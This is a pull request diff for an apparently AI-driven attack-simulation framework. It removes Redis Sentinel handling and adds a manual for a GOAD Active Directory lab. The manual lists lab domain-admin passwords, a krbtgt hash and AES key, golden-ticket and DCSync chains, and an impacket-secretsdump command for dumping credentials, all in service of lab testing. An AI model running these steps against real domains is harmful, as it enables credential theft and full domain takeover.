### PR TITLE
refactor: remove redis sentinel support and simplify redis connection handling

### DIFF
--- a/.taskfiles/red/Taskfile.yaml
+++ b/.taskfiles/red/Taskfile.yaml
@@ -1040,8 +1040,7 @@ tasks:
         kubectl rollout status -n {{.K8S_NAMESPACE}} deploy/$ORCH_DEPLOY || true
 
         REDIS_POD=$(kubectl get pods -n {{.K8S_NAMESPACE}} -l app=redis -o name 2>/dev/null | head -1)
-        SENTINEL_POD=$(kubectl get pods -n {{.K8S_NAMESPACE}} -l app=redis-sentinel -o name 2>/dev/null | head -1)
-        if [ -z "$REDIS_POD" ] && [ -z "$SENTINEL_POD" ]; then
+        if [ -z "$REDIS_POD" ]; then
           echo "No Redis pod found in namespace {{.K8S_NAMESPACE}}"
           exit 1
         fi
@@ -1051,30 +1050,10 @@ tasks:
         if [ -n "$REDIS_PASS" ]; then
           REDIS_ENV=(env REDISCLI_AUTH="$REDIS_PASS")
         fi
-        # Always use Sentinel pod as client (it can reach master)
-        REDIS_CLIENT_POD="${SENTINEL_POD:-$REDIS_POD}"
-        REDIS_HOST=""
-        REDIS_HOST_ARG=()
-        CONTAINER_ARG=()
-
-        if [ -n "$SENTINEL_POD" ]; then
-          CONTAINER_ARG=(-c sentinel)
-          # Get master IP from Sentinel (returns IP on first line, port on second)
-          REDIS_HOST=$(kubectl exec -n {{.K8S_NAMESPACE}} "$SENTINEL_POD" "${CONTAINER_ARG[@]}" -- "${REDIS_ENV[@]}" redis-cli -p 26379 sentinel get-master-addr-by-name aresmaster 2>/dev/null | head -1 || true)
-          if [ -z "$REDIS_HOST" ]; then
-            echo "ERROR: Sentinel did not return master IP. Cannot proceed with clear."
-            echo "Check Sentinel health: kubectl exec -n {{.K8S_NAMESPACE}} $SENTINEL_POD -c sentinel -- redis-cli -p 26379 info sentinel"
-            exit 1
-          fi
-          echo "Using Redis master at $REDIS_HOST (via Sentinel)"
-          REDIS_HOST_ARG=(-h "$REDIS_HOST" -p 6379)
-        else
-          echo "WARNING: No Sentinel found, using Redis pod directly (may hit replica)"
-        fi
 
         # Helper function to run redis-cli commands
         redis_cmd() {
-          kubectl exec -n {{.K8S_NAMESPACE}} "$REDIS_CLIENT_POD" "${CONTAINER_ARG[@]}" -- "${REDIS_ENV[@]}" redis-cli "${REDIS_HOST_ARG[@]}" "$@"
+          kubectl exec -n {{.K8S_NAMESPACE}} "$REDIS_POD" -- "${REDIS_ENV[@]}" redis-cli "$@"
         }
 
         # Verify we can write to Redis before proceeding

--- a/docs/codemap.md
+++ b/docs/codemap.md
@@ -70,7 +70,7 @@ The central framework for both blue and red team operations.
 | `orchestrator_client.py` | Client for communicating with orchestrator |
 | `orchestrator_service.py` | Orchestrator service pod implementation |
 | `query_resilience.py` | Query retry logic and resilience patterns |
-| `redis_client.py` | Redis client wrapper with Sentinel support |
+| `redis_client.py` | Redis client wrapper |
 | `remote.py` | Remote execution on Kubernetes pods |
 | `templates.py` | Jinja2 template loading and rendering |
 | `alert_correlation.py` | Alert clustering for blue team investigations |

--- a/docs/testing/MANUAL-ESSOS.md
+++ b/docs/testing/MANUAL-ESSOS.md
@@ -1,0 +1,204 @@
+# Manual Multi-Forest End-to-End: DreadGOAD
+
+What it actually takes to get all three forests dominated, step by step.
+
+## Why Manual Steps Are Needed
+
+The automated chain handles `north.sevenkingdoms.local` → `sevenkingdoms.local`
+escalation well, but **essos.local requires manual intervention** because:
+
+1. **Impacket cross-realm Kerberos is broken** (`KDC_ERR_WRONG_REALM` in
+   v0.13.0.dev0+20251022) — inter-realm TGTs cannot be exchanged for service
+   tickets on the target KDC. This blocks the trust-key-based attack path.
+2. **PTH with source-domain Admin has no DCSync rights on foreign forest** —
+   `sevenkingdoms.local\Administrator` cannot replicate `essos.local`.
+3. **Agents rarely discover essos.local DA credentials naturally** in test
+   timeframes — MSSQL exploitation on braavos times out, password spray hasn't
+   been finding `daenerys.targaryen`.
+
+## Prerequisites
+
+```bash
+# Sync code and restart all pods
+task -y red:multi:sync:align TEAM=all
+
+# Start operation
+task -y red:multi TARGET=dreadgoad
+
+# Get operation ID
+OP_ID=$(task red:multi:list 2>/dev/null | grep '\[running\]' | tail -1 | awk '{print $1}')
+echo "Operation: $OP_ID"
+```
+
+Wait ~30s for agents to discover hosts, then proceed.
+
+## Step 1: Set DC Mappings
+
+The `domain_controllers` Redis hash must be populated. Agents discover hosts but
+don't always map domain→DC IP correctly (winterfell reports as
+`sevenkingdoms.local` in banners, not `north.sevenkingdoms.local`).
+
+```bash
+ORCH_POD=$(kubectl get pods -n attack-simulation | grep "^ares-orchestrator" | awk '{print $1}')
+
+kubectl exec -n attack-simulation $ORCH_POD -- python3 -c "
+import redis, os
+pw = os.environ['REDIS_PASSWORD']
+r = redis.Redis(host='redis-0.redis-headless.attack-simulation.svc.cluster.local',
+                port=6379, password=pw, decode_responses=True)
+key = 'ares:op:${OP_ID}:domain_controllers'
+r.hset(key, 'north.sevenkingdoms.local', '10.1.2.121')
+r.hset(key, 'sevenkingdoms.local', '10.1.2.238')
+r.hset(key, 'essos.local', '10.1.2.211')
+print('DC map:', dict(r.hgetall(key)))
+"
+```
+
+## Step 2: Inject Domain SIDs
+
+Golden ticket and cross-forest attacks need domain SIDs. These are normally
+extracted from secretsdump output, but we inject them to skip the lookupsid
+step (which often fails with `STATUS_NETLOGON_NOT_STARTED` in GOAD).
+
+```bash
+task red:multi:inject-domain-sid OPERATION_ID=$OP_ID \
+  DOMAIN=north.sevenkingdoms.local \
+  SID=S-1-5-21-1328384573-4090356449-2552632942
+
+task red:multi:inject-domain-sid OPERATION_ID=$OP_ID \
+  DOMAIN=sevenkingdoms.local \
+  SID=S-1-5-21-2541677866-1628385213-2562505918
+
+task red:multi:inject-domain-sid OPERATION_ID=$OP_ID \
+  DOMAIN=essos.local \
+  SID=S-1-5-21-1606295247-3362563358-1415986617
+```
+
+## Step 3: Inject Credentials
+
+These simulate what agents would discover via password spray, kerberoasting,
+MSSQL exploitation, etc.
+
+```bash
+# Child domain DA (eddard.stark is DA on north.sevenkingdoms.local)
+task red:multi:inject-credential OPERATION_ID=$OP_ID \
+  USERNAME=eddard.stark PASSWORD='FightP3aceAndHonor!' \  # pragma: allowlist secret
+  DOMAIN=north.sevenkingdoms.local
+
+# Parent domain DA (cersei.lannister is DA on sevenkingdoms.local)
+# Used by credential fallback when golden ticket DCSync fails
+task red:multi:inject-credential OPERATION_ID=$OP_ID \
+  USERNAME=cersei.lannister PASSWORD='il0vejaime' \  # pragma: allowlist secret
+  DOMAIN=sevenkingdoms.local
+
+# CRITICAL: essos.local DA — this is the one agents don't find naturally
+task red:multi:inject-credential OPERATION_ID=$OP_ID \
+  USERNAME=daenerys.targaryen PASSWORD='BurnThemAll!' \  # pragma: allowlist secret
+  DOMAIN=essos.local
+```
+
+## Step 4: Inject krbtgt Hash (Triggers the Chain)
+
+This is the domino that starts the automated chain. The AES256 key is required
+because Windows Server 2016+ DCs reject RC4 golden tickets with
+`KDC_ERR_TGT_REVOKED`.
+
+```bash
+task red:multi:inject-hash OPERATION_ID=$OP_ID \
+  USERNAME=krbtgt DOMAIN=north.sevenkingdoms.local \
+  HASH="aad3b435b51404eeaad3b435b51404ee:faaa7e195adfc629437d6e9135712b5d" \
+  AES_KEY="fc0a616dc66a009191d790779ca0d5abb7e125bc3a6fb3621e491ef91f991bfa"  # pragma: allowlist secret
+```
+
+## What Happens Automatically After Injection
+
+The orchestrator's `_auto_golden_ticket` loop (runs every 30s) detects the
+krbtgt hash and executes this chain:
+
+```text
+1. north.sevenkingdoms.local krbtgt + AES256
+   → Golden ticket with ExtraSid (Enterprise Admin SID for parent)
+   → DCSync child DC for SEVENKINGDOMS$ trust hash
+
+2. If golden ticket DCSync fails (KDC_ERR_TGT_REVOKED with bad AES):
+   → Credential fallback: uses cersei.lannister to DCSync parent DC
+   → Extracts Administrator, krbtgt, ESSOS$ trust hash from parent
+
+3. Cross-forest attack on essos.local:
+   → Inter-realm TGT with ESSOS$ trust key → KDC_ERR_WRONG_REALM (fails)
+   → PTH fallback with sevenkingdoms.local\Administrator → ACCESS_DENIED (fails)
+   → Target-domain credential DCSync with daenerys.targaryen → SUCCESS
+
+4. essos.local\krbtgt + Administrator extracted
+   → all_forests_dominated() = True
+   → Operation marked complete
+```
+
+## Step 5: Monitor Progress
+
+```bash
+# Watch for golden ticket and cross-forest events
+kubectl logs -f -n attack-simulation $(kubectl get pods -n attack-simulation \
+  | grep "^ares-orchestrator" | awk '{print $1}') 2>/dev/null \
+  | grep -E "🎫|🌲|FOREST DOMINATED|all_forests_dominated|operation.*complete"
+
+# Check loot (refreshes every 5s)
+task red:multi:loot LATEST=true WATCH=5
+
+# Verify completion
+task red:multi:list LATEST=true
+```
+
+Expected output when complete:
+
+```text
+*** MULTI-FOREST COMPROMISE ***
+  Forests compromised: essos.local, sevenkingdoms.local
+*** DOMAIN ADMIN ACHIEVED ***
+  Compromised domains: essos.local, north.sevenkingdoms.local, sevenkingdoms.local
+```
+
+## Timing
+
+From injection to completion: **~3-5 minutes** (mostly waiting for secretsdump
+commands to run on worker pods).
+
+| Phase | Duration | Bottleneck |
+| ------- | ---------- | ---------- |
+| Golden ticket generation | ~5s | ticketer command |
+| Child DC DCSync (trust hash) | ~60-180s | secretsdump over VPN |
+| Parent DC DCSync (fallback) | ~60-180s | secretsdump over VPN |
+| Cross-forest inter-realm | ~5s | fails immediately |
+| Target-domain credential DCSync | ~30-60s | secretsdump over VPN |
+
+## Obtaining Real Values
+
+If you need to get the actual krbtgt hash and AES key from the GOAD lab
+(values above are for the current DreadGOAD deployment):
+
+```bash
+# From any worker pod with network access to winterfell (10.1.2.121):
+kubectl exec -it -n attack-simulation ares-privesc-agent-0 -- bash
+
+# DCSync krbtgt from north.sevenkingdoms.local
+impacket-secretsdump 'north.sevenkingdoms.local/eddard.stark:FightP3aceAndHonor!@10.1.2.121' \
+  -just-dc-user 'krbtgt' 2>&1
+
+# Output will contain:
+#   krbtgt:502:aad3b435b51404ee...:faaa7e195adfc629...:::
+#   krbtgt:aes256-cts-hmac-sha1-96:fc0a616dc66a009191d790779...
+```
+
+## Known Issues
+
+- **winterfell hostname**: nmap/LDAP reports `Domain: sevenkingdoms.local`
+  (forest root) instead of `north.sevenkingdoms.local`. Code handles this but
+  it can confuse DC candidate selection.
+- **Credential fallback ordering**: If a non-DA credential is injected before a
+  DA credential for the same domain, the non-DA may be picked first. Fixed in
+  latest code (prefers `administrator`/`admin` usernames, then `is_admin=True`).
+- **`_cross_forest_attempted` dedup**: Previously blocked retries even when no
+  credentials were available for PTH. Fixed — now only marks attempted when
+  credentials were actually used.
+- **impacket KDC_ERR_WRONG_REALM**: Fundamental bug in impacket's cross-realm
+  Kerberos. No fix available. All inter-realm TGT approaches fail.

--- a/src/ares/agents/blue/multi_agent_orchestrator.py
+++ b/src/ares/agents/blue/multi_agent_orchestrator.py
@@ -802,7 +802,7 @@ class BlueTeamOrchestrator:
         is persisted even if the orchestrator service crashes before it can
         update the status itself.
 
-        Retries with fresh Redis connections on failure to handle stale Sentinel
+        Retries with fresh Redis connections on failure to handle stale
         connections after pod restarts.
 
         Args:
@@ -814,7 +814,7 @@ class BlueTeamOrchestrator:
         import json
         from datetime import datetime, timezone
 
-        from ares.core.redis_client import create_redis_client, invalidate_sentinel_client
+        from ares.core.redis_client import create_redis_client
 
         status_key = f"ares:blue:inv:{investigation_id}:status"
         now = datetime.now(timezone.utc).isoformat()
@@ -860,8 +860,6 @@ class BlueTeamOrchestrator:
                 )
 
                 if attempt < max_retries - 1:
-                    # Invalidate sentinel and get fresh client for retry
-                    invalidate_sentinel_client()
                     await asyncio.sleep(0.5 * (attempt + 1))  # Backoff: 0.5s, 1s
                     try:
                         client = await create_redis_client()

--- a/src/ares/core/base_task_queue.py
+++ b/src/ares/core/base_task_queue.py
@@ -19,11 +19,7 @@ from typing import TYPE_CHECKING
 from loguru import logger
 
 from ares.core.config import get_agent_heartbeat_timeout, get_redis_url
-from ares.core.redis_client import (
-    create_redis_client,
-    get_redis_sentinel_config,
-    invalidate_sentinel_client,
-)
+from ares.core.redis_client import create_redis_client
 
 if TYPE_CHECKING:
     from redis.asyncio import Redis
@@ -76,8 +72,7 @@ class BaseTaskQueue(abc.ABC):
         """Connect to Redis.
 
         When called from a non-main thread (e.g., threaded result consumer),
-        uses direct connection to avoid SentinelConnectionPool's cross-loop
-        Future issues.
+        uses direct connection to avoid connection pool's cross-loop issues.
 
         Uses socket_timeout=None to allow blocking operations (BRPOP) to wait
         for extended periods without hitting socket timeout. Timeout control
@@ -87,7 +82,7 @@ class BaseTaskQueue(abc.ABC):
             return
 
         # Use direct connection when in a non-main thread to avoid
-        # SentinelConnectionPool's async state being shared across event loops
+        # connection pool's async state being shared across event loops
         is_main_thread = threading.current_thread() is threading.main_thread()
         direct_connection = not is_main_thread
 
@@ -104,14 +99,7 @@ class BaseTaskQueue(abc.ABC):
             )
             await self._client.ping()
             self._connected = True
-
-            if get_redis_sentinel_config():
-                conn_type = "direct" if direct_connection else "via Sentinel"
-                logger.info(
-                    f"{self.__class__.__name__} connected to Redis {conn_type} (socket_timeout=None)"
-                )
-            else:
-                logger.info(f"{self.__class__.__name__} connected to Redis at {self.redis_url}")
+            logger.info(f"{self.__class__.__name__} connected to Redis at {self.redis_url}")
 
         except Exception as e:
             raise RuntimeError(f"Failed to connect to Redis: {e}") from e
@@ -127,8 +115,7 @@ class BaseTaskQueue(abc.ABC):
         """Ping Redis and reconnect if the connection is stale.
 
         This should be called periodically to detect stale connections caused by
-        Sentinel pod restarts. When a Sentinel pod restarts with a new IP, existing
-        connections may hang indefinitely.
+        pod restarts.
 
         Args:
             timeout: Max seconds to wait for ping response
@@ -145,8 +132,6 @@ class BaseTaskQueue(abc.ABC):
             return True
         except Exception as e:
             logger.warning(f"Redis ping failed ({type(e).__name__}: {e}), forcing reconnection")
-            # Invalidate Sentinel client to force fresh DNS resolution
-            invalidate_sentinel_client()
             self._connected = False
             try:
                 if self._client:
@@ -154,7 +139,6 @@ class BaseTaskQueue(abc.ABC):
             except Exception:
                 pass
             self._client = None
-            # Reconnect with fresh Sentinel IPs
             await self.connect()
             logger.info("Reconnected to Redis after ping failure")
             return False

--- a/src/ares/core/blue_orchestrator_service.py
+++ b/src/ares/core/blue_orchestrator_service.py
@@ -23,7 +23,6 @@ from ares.core.config import get_namespace, get_redis_url
 from ares.core.litellm_env import configure_litellm_env
 from ares.core.redis_client import (
     get_retry_delay,
-    invalidate_sentinel_client,
     is_connection_error,
 )
 from ares.core.task_queue import RedisTaskQueue
@@ -356,7 +355,7 @@ class BlueOrchestratorService:
                     else:
                         logger.warning(
                             f"No successful Redis poll for {elapsed:.1f}s and ping failed, "
-                            f"forcing reconnection (possible Sentinel pod restart)"
+                            f"forcing reconnection (possible pod restart)"
                         )
                         await self._force_reconnect()
                         last_successful_poll = time.monotonic()
@@ -370,9 +369,7 @@ class BlueOrchestratorService:
                 await asyncio.sleep(5)
 
     async def _force_reconnect(self) -> None:
-        """Force reconnection to Redis by invalidating cached clients."""
-        invalidate_sentinel_client()
-
+        """Force reconnection to Redis."""
         if self.task_queue:
             try:
                 await self.task_queue.disconnect()
@@ -664,7 +661,6 @@ class BlueOrchestratorService:
                             f"(attempt {attempt + 1}/{max_retries}): {e}. "
                             f"Retrying in {delay:.1f}s..."
                         )
-                        invalidate_sentinel_client()
                         await asyncio.sleep(delay)
                     else:
                         raise

--- a/src/ares/core/blue_state_backend.py
+++ b/src/ares/core/blue_state_backend.py
@@ -35,7 +35,7 @@ Redis key structure:
 
 Resilience:
     All write operations use tenacity retry with exponential backoff + circuit breaker
-    to handle transient Redis connection issues (e.g., Sentinel failover, pod restarts).
+    to handle transient Redis connection issues (e.g., pod restarts).
     Pattern matches redis-py's ExponentialBackoff(cap=10, base=1).
 """
 

--- a/src/ares/core/blue_task_queue.py
+++ b/src/ares/core/blue_task_queue.py
@@ -30,7 +30,6 @@ from ares.core.config import (
 )
 from ares.core.redis_client import (
     get_retry_delay,
-    invalidate_sentinel_client,
     is_connection_error,
     timed_redis_write,
 )
@@ -125,14 +124,8 @@ class BlueTaskQueue(BaseTaskQueue):
         self.use_global_queue = use_global_queue
 
     def _handle_connection_error(self, error: Exception) -> None:
-        """Handle Redis connection errors by resetting connection state.
-
-        Overrides base class to also invalidate Sentinel client for fresh DNS resolution.
-        """
-        # Call base class to reset state
+        """Handle Redis connection errors by resetting connection state."""
         super()._handle_connection_error(error)
-        # Also invalidate Sentinel for fresh DNS resolution
-        invalidate_sentinel_client()
 
     def _task_queue_key(self, investigation_id: str, role: str) -> str:
         """Get task queue key for a role within an investigation (legacy mode)."""
@@ -402,7 +395,7 @@ class BlueTaskQueue(BaseTaskQueue):
         """Wait for a task result.
 
         Includes automatic retry with exponential backoff on connection errors.
-        This is critical for handling Sentinel failover where IPs may be stale.
+        This is critical for handling connection failures where IPs may be stale.
 
         Args:
             task_id: Task ID to wait for.
@@ -515,7 +508,7 @@ class BlueTaskQueue(BaseTaskQueue):
                     f"stale connection detected (attempt {attempt + 1}/{max_retries + 1})"
                 )
                 self._handle_connection_error(
-                    TimeoutError("BRPOP hung - possible stale Sentinel connection")
+                    TimeoutError("BRPOP hung - possible stale connection")
                 )
                 last_error = TimeoutError("BRPOP hung after retries")
                 continue
@@ -577,7 +570,7 @@ class BlueTaskQueue(BaseTaskQueue):
                     f"stale connection detected (attempt {attempt + 1}/{max_retries + 1})"
                 )
                 self._handle_connection_error(
-                    TimeoutError("BRPOP hung - possible stale Sentinel connection")
+                    TimeoutError("BRPOP hung - possible stale connection")
                 )
                 last_error = TimeoutError("BRPOP hung after retries")
                 continue

--- a/src/ares/core/dispatcher/monitoring.py
+++ b/src/ares/core/dispatcher/monitoring.py
@@ -214,7 +214,6 @@ class MonitoringMixin:
                         "broken pipe",
                         "reset",
                         "refused",
-                        "sentinel",
                     ]
                 )
 
@@ -830,7 +829,7 @@ class MonitoringMixin:
         """Ping dispatcher's Redis client and reconnect if stale.
 
         The dispatcher has its own _redis_client separate from _task_queue.
-        Both need health checking to detect stale Sentinel connections after
+        Both need health checking to detect stale connections after
         pod restarts.
 
         Args:
@@ -849,10 +848,7 @@ class MonitoringMixin:
             logger.warning(
                 f"Dispatcher Redis ping failed ({type(e).__name__}: {e}), forcing reconnection"
             )
-            # Invalidate Sentinel client to force fresh DNS resolution
-            from ares.core.redis_client import create_redis_client, invalidate_sentinel_client
-
-            invalidate_sentinel_client()
+            from ares.core.redis_client import create_redis_client
 
             # Close stale client
             try:
@@ -861,7 +857,7 @@ class MonitoringMixin:
                 pass
             self._redis_client = None
 
-            # Reconnect with fresh Sentinel IPs
+            # Reconnect
             try:
                 self._redis_client = await create_redis_client(self._redis_url)
                 await self._redis_client.ping()
@@ -914,8 +910,8 @@ class MonitoringMixin:
 
                 now = time.monotonic()
 
-                # Check Redis connection health to detect stale Sentinel connections
-                # This catches issues when Sentinel pods restart with new IPs
+                # Check Redis connection health to detect stale connections
+                # This catches issues when pods restart
                 # Both _task_queue and _redis_client need health checks - they are separate clients
                 if now - last_connection_check >= connection_check_interval:
                     # Check task queue Redis client
@@ -1229,7 +1225,7 @@ class MonitoringMixin:
         task_queue: RedisTaskQueue | None = None
 
         try:
-            # Connect to Redis with retries (Sentinel may not be ready immediately)
+            # Connect to Redis with retries
             if redis_url:
                 max_connect_retries = 10
                 for attempt in range(max_connect_retries):
@@ -1312,8 +1308,6 @@ class MonitoringMixin:
 
     def _handle_consumer_error(self: RedTeamDispatcher, e: Exception, failures: int) -> bool:
         """Handle errors in the threaded result consumer. Returns True if should stop."""
-        from ares.core.redis_client import invalidate_sentinel_client
-
         error_str = str(e).lower()
         connection_keywords = [
             "connection",
@@ -1322,7 +1316,6 @@ class MonitoringMixin:
             "broken pipe",
             "reset",
             "refused",
-            "sentinel",
             # DNS resolution failures
             "name or service not known",
             "getaddrinfo",
@@ -1331,8 +1324,6 @@ class MonitoringMixin:
         is_connection_error = any(kw in error_str for kw in connection_keywords)
 
         if is_connection_error:
-            # Invalidate Sentinel client to force fresh DNS resolution on reconnect
-            invalidate_sentinel_client()
             max_failures = get_max_redis_consecutive_failures()
             delay = min(
                 get_redis_retry_base_delay() * (2 ** min(failures - 1, 4)),

--- a/src/ares/core/models.py
+++ b/src/ares/core/models.py
@@ -1479,7 +1479,7 @@ class SharedRedTeamState:
         """
         import base64
 
-        # Limit artifact size to 10MB (Redis Sentinel provides robust storage)
+        # Limit artifact size to 10MB
         max_size = 10 * 1024 * 1024
         if isinstance(content, str):
             content_bytes = content.encode("utf-8", errors="replace")

--- a/src/ares/core/orchestrator/_orchestrator.py
+++ b/src/ares/core/orchestrator/_orchestrator.py
@@ -919,7 +919,6 @@ async def run_multi_agent_operation(
                         "broken pipe",
                         "reset",
                         "refused",
-                        "sentinel",
                     ]
                     if any(kw in error_str.lower() for kw in redis_error_keywords):
                         redis_retry_count += 1

--- a/src/ares/core/orchestrator_service.py
+++ b/src/ares/core/orchestrator_service.py
@@ -22,7 +22,6 @@ from ares.core.litellm_env import configure_litellm_env
 from ares.core.models import Credential
 from ares.core.orchestrator import run_multi_agent_operation
 from ares.core.recovery import OperationRecoveryManager
-from ares.core.redis_client import invalidate_sentinel_client
 from ares.core.task_queue import RedisTaskQueue
 
 
@@ -411,7 +410,7 @@ class OrchestratorService:
 
         last_successful_poll = time.monotonic()
         # If no successful poll for this many seconds, force reconnect
-        # This handles stale Sentinel connections after pod restarts
+        # This handles stale connections after pod restarts
         stale_connection_threshold = 30.0
 
         while self.running:
@@ -428,7 +427,7 @@ class OrchestratorService:
 
             except asyncio.TimeoutError:
                 # asyncio.wait_for timed out - BLPOP didn't return in time
-                # This could mean the connection is stale (Sentinel pod restarted)
+                # This could mean the connection is stale (pod restarted)
                 # or simply that no tasks are in the queue (normal idle state)
                 elapsed = time.monotonic() - last_successful_poll
                 if elapsed > stale_connection_threshold:
@@ -442,14 +441,14 @@ class OrchestratorService:
                     else:
                         logger.warning(
                             f"No successful Redis poll for {elapsed:.1f}s and ping failed, "
-                            f"forcing reconnection (possible Sentinel pod restart)"
+                            f"forcing reconnection (possible pod restart)"
                         )
                         await self._force_reconnect()
                         last_successful_poll = time.monotonic()
                 continue
             except Exception as e:
                 logger.error(f"Error in service loop: {e}")
-                # On Redis errors, invalidate Sentinel client and reconnect
+                # On Redis errors, reconnect
                 if "ConnectionError" in str(type(e).__name__) or "Redis" in str(type(e).__name__):
                     logger.warning("Redis connection error, forcing reconnection")
                     await self._force_reconnect()
@@ -457,10 +456,7 @@ class OrchestratorService:
                 await asyncio.sleep(5)  # Back off on error
 
     async def _force_reconnect(self) -> None:
-        """Force reconnection to Redis by invalidating cached clients."""
-        # Invalidate the thread-local Sentinel client to force fresh DNS resolution
-        invalidate_sentinel_client()
-
+        """Force reconnection to Redis."""
         # Disconnect and reconnect the task queue
         if self.task_queue:
             try:

--- a/src/ares/core/recovery.py
+++ b/src/ares/core/recovery.py
@@ -96,8 +96,8 @@ class OperationRecoveryManager:
         """
         Handle Redis connection errors by resetting connection state.
 
-        This allows the next operation to attempt reconnection via Sentinel,
-        which will discover the current master (handles pod restarts/failover).
+        This allows the next operation to attempt reconnection
+        (handles pod restarts).
         """
         self._connected = False
         if self._redis_client:

--- a/src/ares/core/redis_backend_base.py
+++ b/src/ares/core/redis_backend_base.py
@@ -144,7 +144,7 @@ class BaseRedisBackend(abc.ABC):
     async def _with_retry(self, operation_name: str, operation) -> Any:
         """Execute a Redis operation with circuit breaker + tenacity retry.
 
-        Provides resilience for transient Redis connection issues (Sentinel failover,
+        Provides resilience for transient Redis connection issues (
         pod restarts, network blips). Pattern follows:
         - redis-py's ExponentialBackoff(cap=10, base=1)
         - tenacity's AsyncRetrying for async retry logic

--- a/src/ares/core/redis_client.py
+++ b/src/ares/core/redis_client.py
@@ -1,34 +1,19 @@
-"""Redis client helpers, including optional Sentinel support.
+"""Redis client helpers.
 
-Sentinel Configuration:
-    REDIS_SENTINEL_HOST: Comma-separated Sentinel hosts or headless service DNS
-        Examples:
-        - "redis-sentinel-headless.ns.svc.cluster.local" (single headless, resolves to multiple IPs)
-        - "sentinel-0:26379,sentinel-1:26379,sentinel-2:26379" (explicit list)
-    REDIS_SENTINEL_PORT: Port for Sentinels (default: 26379)
-    REDIS_SENTINEL_MASTER: Master name (e.g., "aresmaster")
-    REDIS_SENTINEL_PASSWORD: Password for Sentinel auth (defaults to REDIS_PASSWORD)
+Environment Variables:
+    REDIS_URL: Redis connection URL (e.g., "redis://:password@redis:6379/0")
     REDIS_PASSWORD: Password for Redis auth
-
-Read Replicas:
-    Use create_redis_replica_client() for read-only operations to distribute
-    load across replicas. The replica client automatically handles replica
-    discovery via Sentinel.
-
-ROLE Verification:
-    Use create_verified_redis_client() for CLI and read operations where stale
-    data from a demoted master would be problematic. This follows the official
-    Redis Sentinel client spec: https://redis.io/docs/latest/develop/reference/sentinel-clients/
+    REDIS_SOCKET_TIMEOUT: Socket timeout in seconds (default: 10.0)
+    REDIS_SOCKET_CONNECT_TIMEOUT: Connection timeout (default: 5.0)
+    REDIS_HEALTH_CHECK_INTERVAL: Health check interval (default: 10.0)
+    REDIS_WRITE_TIMEOUT: Write operation timeout (default: 10.0)
 """
 
 from __future__ import annotations
 
 import asyncio
 import os
-import socket
-import threading
-import time
-from typing import TYPE_CHECKING, Any
+from typing import TYPE_CHECKING
 
 if TYPE_CHECKING:
     from types import EllipsisType
@@ -36,19 +21,6 @@ if TYPE_CHECKING:
 from loguru import logger
 
 from ares.core.config import get_redis_url
-
-# Thread-local Sentinel client storage
-# Each thread needs its own Sentinel client because asyncio futures are bound to
-# the event loop that created them. The threaded result consumer creates a new
-# event loop, so it needs its own Sentinel client.
-_thread_local = threading.local()
-
-# Sentinel client TTL in seconds - after this time, re-resolve DNS for fresh IPs
-# This handles Sentinel pod restarts that change pod IPs
-# NOTE: This TTL only applies when creating NEW connections. Existing connections
-# via SentinelConnectionPool are NOT affected by this TTL - they use their own
-# internal connection management. Use ping_or_reconnect() for health checks.
-_SENTINEL_CLIENT_TTL = float(os.getenv("REDIS_SENTINEL_CLIENT_TTL", "30"))
 
 
 def _parse_int(value: str | None, default: int) -> int:
@@ -71,109 +43,8 @@ def _parse_optional_float(value: str | None, default: float | None) -> float | N
         return default
 
 
-def _resolve_sentinel_hosts(host_config: str, default_port: int) -> list[tuple[str, int]]:
-    """
-    Resolve Sentinel hosts from configuration string.
-
-    Supports:
-    - Comma-separated hosts: "host1:26379,host2:26379,host3:26379"
-    - Single host with port: "host:26379"
-    - Headless service DNS (resolves to multiple IPs): "redis-sentinel-headless.ns.svc"
-
-    Args:
-        host_config: Host configuration string
-        default_port: Default Sentinel port if not specified
-
-    Returns:
-        List of (host, port) tuples for Sentinel connections
-    """
-    sentinels: list[tuple[str, int]] = []
-
-    # Check for comma-separated hosts
-    if "," in host_config:
-        for raw_host in host_config.split(","):
-            host_part = raw_host.strip()
-            if not host_part:
-                continue
-            if ":" in host_part:
-                h, p = host_part.rsplit(":", 1)
-                sentinels.append((h.strip(), int(p)))
-            else:
-                sentinels.append((host_part, default_port))
-    else:
-        # Single host - might be headless service, try DNS resolution
-        host = host_config.strip()
-        port = default_port
-        if ":" in host:
-            host, port_str = host.rsplit(":", 1)
-            port = int(port_str)
-
-        # Try to resolve DNS to get all IPs (headless service returns multiple)
-        try:
-            # getaddrinfo returns all IPs for a hostname
-            results = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM)
-            ips: list[str] = list({str(result[4][0]) for result in results})  # Dedupe IPs
-
-            if len(ips) > 1:
-                # Headless service - use all resolved IPs
-                logger.info(f"Resolved {host} to {len(ips)} Sentinel IPs: {ips}")
-                for ip in ips:
-                    sentinels.append((ip, port))
-            else:
-                # Single IP or couldn't resolve multiple
-                sentinels.append((host, port))
-        except socket.gaierror:
-            # DNS resolution failed, use hostname as-is
-            logger.debug(f"Could not resolve {host}, using hostname directly")
-            sentinels.append((host, port))
-
-    return sentinels
-
-
-def get_redis_sentinel_config() -> dict[str, Any] | None:
-    """
-    Return Sentinel config from env, or None when not configured.
-
-    Environment variables:
-        REDIS_SENTINEL_HOST: Sentinel host(s) - comma-separated or headless DNS
-        REDIS_SENTINEL_PORT: Sentinel port (default: 26379)
-        REDIS_SENTINEL_MASTER: Master name (required)
-        REDIS_SENTINEL_PASSWORD: Sentinel auth password
-        REDIS_PASSWORD: Redis auth password
-        REDIS_DB: Redis database number (default: 0)
-
-    Returns:
-        Config dict with 'sentinels' list, or None if not configured
-    """
-    host = os.getenv("REDIS_SENTINEL_HOST")
-    master = os.getenv("REDIS_SENTINEL_MASTER")
-    if not host or not master:
-        return None
-
-    port = _parse_int(os.getenv("REDIS_SENTINEL_PORT"), 26379)
-    sentinel_password = os.getenv("REDIS_SENTINEL_PASSWORD") or os.getenv("REDIS_PASSWORD")
-    redis_password = os.getenv("REDIS_PASSWORD") or sentinel_password
-    db = _parse_int(os.getenv("REDIS_DB"), 0)
-
-    # Resolve hosts (supports multiple sentinels)
-    sentinels = _resolve_sentinel_hosts(host, port)
-
-    logger.info(f"Sentinel config: {len(sentinels)} sentinel(s), master={master}")
-
-    return {
-        "sentinels": sentinels,
-        "master": master,
-        "sentinel_password": sentinel_password,
-        "redis_password": redis_password,
-        "db": db,
-    }
-
-
 def _get_redis_timeouts() -> tuple[float | None, float | None, float | None]:
     """Get Redis timeout configuration from environment."""
-    # Use 10s socket timeout to detect stale connections faster
-    # This is important when Sentinel pods restart with new IPs - the old
-    # connections will hang until socket timeout triggers
     default_socket_timeout = 10.0
     socket_timeout = _parse_optional_float(
